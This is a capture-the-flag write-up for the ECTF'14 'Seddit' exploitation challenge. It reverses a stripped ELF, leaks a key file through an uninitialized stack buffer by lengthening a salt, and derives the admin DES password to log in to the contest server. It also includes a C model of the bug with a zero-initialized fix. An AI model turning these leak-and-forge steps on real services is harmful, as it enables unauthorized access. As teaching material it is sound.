

ECTF'14 was last weekend.
Here is my writeup for the Exploitation 400 challenge, Seddit:

Seddit has opened a new service to share posts and links through command line. Check it out here.

Hint: A pinch of ____
nc 212.71.235.214 6000 


Let's open the tar and see what the file is.

$ file seddit.tar.gz 
seddit.tar.gz: gzip compressed data, from Unix, last modified: Sat Oct 18 19:24:04 2014
$ tar -xvf seddit.tar.gz 
seddit
$ file seddit
seddit: ELF 64-bit LSB  executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=8ef4bbb0d0d50aab01844f4ec1b310261844a202, stripped

It is a stripped 64-bit ELF binary.
Let's run it and see what it does.

$ chmod +x ./seddit
$ ./seddit
############################################################################
###  Welcome to seddit! - Share you thoughts and links!                 ####
############################################################################
#######################
#  1.Create account   #
#  2.Login            #
#  3.Make a post      #
#  4.Exit             #
#######################
What would you like to do? ^C



The program allows you to create an account, login, and make posts (which it seems you can't view again later).

Looking in IDA, we can follow the string "flag" and see that if you log in as admin, the program prints the flag.



Looking at the login function, it calls a helper function with the entered username as its argument.



Inside that helper, a key file is opened.



A buffer originally containing 'aaaaaaa' is then overwritten by concatenating the key from the file onto it.



Finally, the username is DES-encrypted with that concatenated key.



The result is returned and compared to the entered password to decide whether the user may log in. However, byte_6020C0 (the last salt entered when creating an account) is set to 0 before the encrypt function runs for the admin.



So the encryption key is 'aaaaaaa' followed by whatever is read from the key file. The next step is to leak that key. Cross-referencing the key filename string shows that the file is also opened in the make-post function. The other thing to note about the make-post function is that var_50 is only initialized if you choose to make a text post. It is printed regardless of the post type, so a link-only post prints whatever was left on the stack.
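To make the bug concrete, here is an added example that is not the challenge binary's code: a constructed C model of a make-post routine whose content buffer is only filled in for text posts but printed for every post, beside a version that zero-initializes the buffer on every path. The function names, CONTENT_LEN and the "highsec" marker planted on the stack are assumptions for the demonstration; whether the stale bytes actually show up in the link-only post depends on the compiler's frame layout, which is why only the fixed version is asserted on.

```c
#include <stdio.h>
#include <string.h>

#define CONTENT_LEN 64   /* assumed buffer size, not taken from the binary */

/* Constructed model of the defect described in the writeup: the content
 * buffer is only written for text posts, but it is emitted for every post
 * type, so a link-only post leaks whatever the stack already contained.
 * The read is bounded to CONTENT_LEN bytes so the model itself cannot
 * run off the end of the buffer. */
static void make_post_vulnerable(int is_text_post, const char *text,
                                 char *out, size_t out_len)
{
    char content[CONTENT_LEN];                 /* no initializer: stale bytes */
    if (is_text_post) {
        snprintf(content, sizeof content, "%s", text);
    }
    snprintf(out, out_len, "%.*s", CONTENT_LEN, content);
}

/* Fixed version: the buffer is zeroed on every path, so a link-only post
 * prints an empty string instead of leftover stack contents. */
static void make_post_fixed(int is_text_post, const char *text,
                            char *out, size_t out_len)
{
    char content[CONTENT_LEN] = {0};           /* zero-initialized */
    if (is_text_post) {
        snprintf(content, sizeof content, "%s", text);
    }
    snprintf(out, out_len, "%s", content);
}

/* Stand-in for the earlier code path that read the key file: it leaves a
 * constructed marker ("highsec") in a stack frame of the same size, so a
 * later uninitialized frame may reuse those bytes. volatile keeps the
 * stores from being optimized away. */
static void load_key_into_frame(void)
{
    volatile char key[CONTENT_LEN];
    const char *marker = "highsec";
    size_t i;
    for (i = 0; i < CONTENT_LEN; i++) {
        key[i] = marker[i] ? marker[i] : '\0';
        if (!marker[i]) break;
    }
}

/* Returns 1 when the fixed version emits nothing for a link-only post. */
int fixed_link_post_is_empty(void)
{
    char out[CONTENT_LEN];
    load_key_into_frame();
    make_post_fixed(0, NULL, out, sizeof out);
    return out[0] == '\0';
}

/* Returns 1 when a text post's content round-trips through the fixed version. */
int fixed_text_post_roundtrip(void)
{
    char out[CONTENT_LEN];
    make_post_fixed(1, "hello", out, sizeof out);
    return strcmp(out, "hello") == 0;
}

int main(void)
{
    char out[CONTENT_LEN];

    load_key_into_frame();
    make_post_vulnerable(0, NULL, out, sizeof out);
    /* May print "highsec" (or other stale bytes) depending on frame layout. */
    printf("vulnerable link-only post content: \"%s\"\n", out);

    make_post_fixed(0, NULL, out, sizeof out);
    printf("fixed link-only post content: \"%s\"\n", out);   /* always "" */
    return 0;
}
```

The fix is the initializer on `content`; compiling with `-Wall -Wuninitialized` (or running under MemorySanitizer) is the cheap way to catch this class of bug before it ships, since the printed value looks like ordinary garbage until someone lines the frames up the way the writeup does with the salt.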



When testing on the server, I find that it doesn't seem to leak anything useful:

What would you like to do? 3
Title: asdf
What type of post? (0: Link Only, 1: Text Post)
0

######## POST CREATED ########
## ID: 1
## content:  	@
##############################



Then we notice that the salt variable (byte_6020C0) is used here as well. If we increase its length by creating an account with a longer salt, the uninitialized post content lines up with the key and we can successfully leak it:

What would you like to do? 1

Enter username:asdf

Enter salt:1234567890abcdef 
Your password is: 6d39088cc5fb4495
#######################
#  1.Create account   #
#  2.Login            #
#  3.Make a post      #
#  4.Exit             #
#######################
What would you like to do? 3
Title: asdf
What type of post? (0: Link Only, 1: Text Post)
0

######## POST CREATED ########
## ID: 1
## content: highsec
�[
##############################


So the key is 'highsec'. Now we just need to reproduce the encryption. To make sure we use exactly the same encryption as the server, we can patch the program with idaPatcher so that it lets us create an account named admin.



Now we can make a key file containing 'highsec' and create the admin account with a salt of 'aaaaaaa', which mirrors the zeroed salt the server uses for admin:

$ echo "highsec" > key
$ ./sedditPatched
############################################################################
###  Welcome to seddit! - Share you thoughts and links!                 ####
############################################################################
#######################
#  1.Create account   #
#  2.Login            #
#  3.Make a post      #
#  4.Exit             #
#######################
What would you like to do? 1

Enter username:admin

Enter salt:aaaaaaa
Your password is: 94140f8339377477
#######################
#  1.Create account   #
#  2.Login            #
#  3.Make a post      #
#  4.Exit             #
#######################
What would you like to do? 4


The encryption yields `94140f8339377477`. Now let's try that password on the real server:

$ nc 212.71.235.214 6000
############################################################################
###  Welcome to seddit! - Share you thoughts and links!                 ####
############################################################################
#######################
#  1.Create account   #
#  2.Login            #
#  3.Make a post      #
#  4.Exit             #
#######################
What would you like to do? 2
Enter username:admin
Enter password:94140f8339377477

Logged in as admin! flag{Encryption_is_Not_a_silver_bullet}
#######################
#  1.Create account   #
#  2.Login            #
#  3.Make a post      #
#  4.Exit             #
#######################
What would you like to do? 4



The flag is `Encryption_is_Not_a_silver_bullet`. The admin password was derived deterministically from a fixed salt and a key that the program itself leaked through an uninitialized buffer, so the DES step added no real protection.